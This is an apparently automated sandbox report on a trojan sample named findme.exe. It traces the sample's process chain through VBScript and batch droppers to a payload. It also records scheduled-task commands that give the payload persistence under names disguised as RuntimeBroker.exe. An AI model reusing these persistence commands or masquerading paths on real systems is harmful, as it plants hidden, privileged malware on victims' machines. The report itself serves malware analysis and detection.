          Source: WGNWJePMcpkvwPkbkGq.exe.10.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: WGNWJePMcpkvwPkbkGq.exe0.10.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: WGNWJePMcpkvwPkbkGq.exe1.10.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: RuntimeBroker.exe.10.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: WGNWJePMcpkvwPkbkGq.exe2.10.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: WGNWJePMcpkvwPkbkGq.exe3.10.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: WGNWJePMcpkvwPkbkGq.exe4.10.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: SearchApp.exe.10.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: RuntimeBroker.exe0.10.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: WGNWJePMcpkvwPkbkGq.exe5.10.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: RuntimeBroker.exe1.10.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: WGNWJePMcpkvwPkbkGq.exe6.10.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: findme.exeBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs findme.exe
          Source: findme.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.adwa.evad.winEXE@30/33@3/1
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004C6EC9 GetLastError,FormatMessageW,0_2_004C6EC9
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004D9E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_004D9E1C
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\Program Files (x86)\google\RuntimeBroker.exeJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\Users\Default User\Application Data\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exeJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeMutant created: NULL
          Source: C:\runtimebrokerHost\webnetdhcp.exeMutant created: \Sessions\1\BaseNamedObjects\Local\6f6d7b64b257ca9e3ed464a4d4958f7deb58efdb
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\runtimebrokerHost\Gjynmp1cQgbqqAJzLCDkc0fMhQUnd.bat" "
          Source: C:\Users\user\Desktop\findme.exeCommand line argument: sfxname0_2_004DD5D4
          Source: C:\Users\user\Desktop\findme.exeCommand line argument: sfxstime0_2_004DD5D4
          Source: C:\Users\user\Desktop\findme.exeCommand line argument: STARTDLG0_2_004DD5D4
          Source: C:\Users\user\Desktop\findme.exeCommand line argument: xjQ0_2_004DD5D4
          Source: findme.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: findme.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\Users\user\Desktop\findme.exeFile read: C:\Windows\win.iniJump to behavior
          Source: C:\Users\user\Desktop\findme.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: findme.exeVirustotal: Detection: 69%
          Source: findme.exeReversingLabs: Detection: 65%
          Source: C:\Users\user\Desktop\findme.exeFile read: C:\Users\user\Desktop\findme.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\findme.exe "C:\Users\user\Desktop\findme.exe"
          Source: C:\Users\user\Desktop\findme.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\runtimebrokerHost\P6MatiaJbshfFUR3.vbe"
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\runtimebrokerHost\Gjynmp1cQgbqqAJzLCDkc0fMhQUnd.bat" "
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\runtimebrokerHost\webnetdhcp.exe "C:\runtimebrokerHost\webnetdhcp.exe"
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /f
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /f
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGqW" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Application Data\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe'" /f
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGqW" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Application Data\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe'" /rl HIGHEST /f
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGq" /sc ONLOGON /tr "'C:\Recovery\WGNWJePMcpkvwPkbkGq.exe'" /rl HIGHEST /f
          Source: C:\Users\user\Desktop\findme.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\runtimebrokerHost\P6MatiaJbshfFUR3.vbe" Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\runtimebrokerHost\Gjynmp1cQgbqqAJzLCDkc0fMhQUnd.bat" "Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\runtimebrokerHost\webnetdhcp.exe "C:\runtimebrokerHost\webnetdhcp.exe"Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: unknown unknownJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: unknown unknownJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: unknown unknownJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: unknown unknownJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: unknown unknownJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: unknown unknownJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: unknown unknownJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: unknown unknownJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: unknown unknownJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /fJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /fJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGqW" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Application Data\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe'" /fJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: unknown unknownJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGqW" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Application Data\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe'" /rl HIGHEST /fJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGq" /sc ONLOGON /tr "'C:\Recovery\WGNWJePMcpkvwPkbkGq.exe'" /rl HIGHEST /fJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: dxgidebug.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: version.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: wldp.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: profapi.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: amsi.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: userenv.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: rasman.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: edputil.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: propsys.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: netutils.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: slc.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: sppc.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
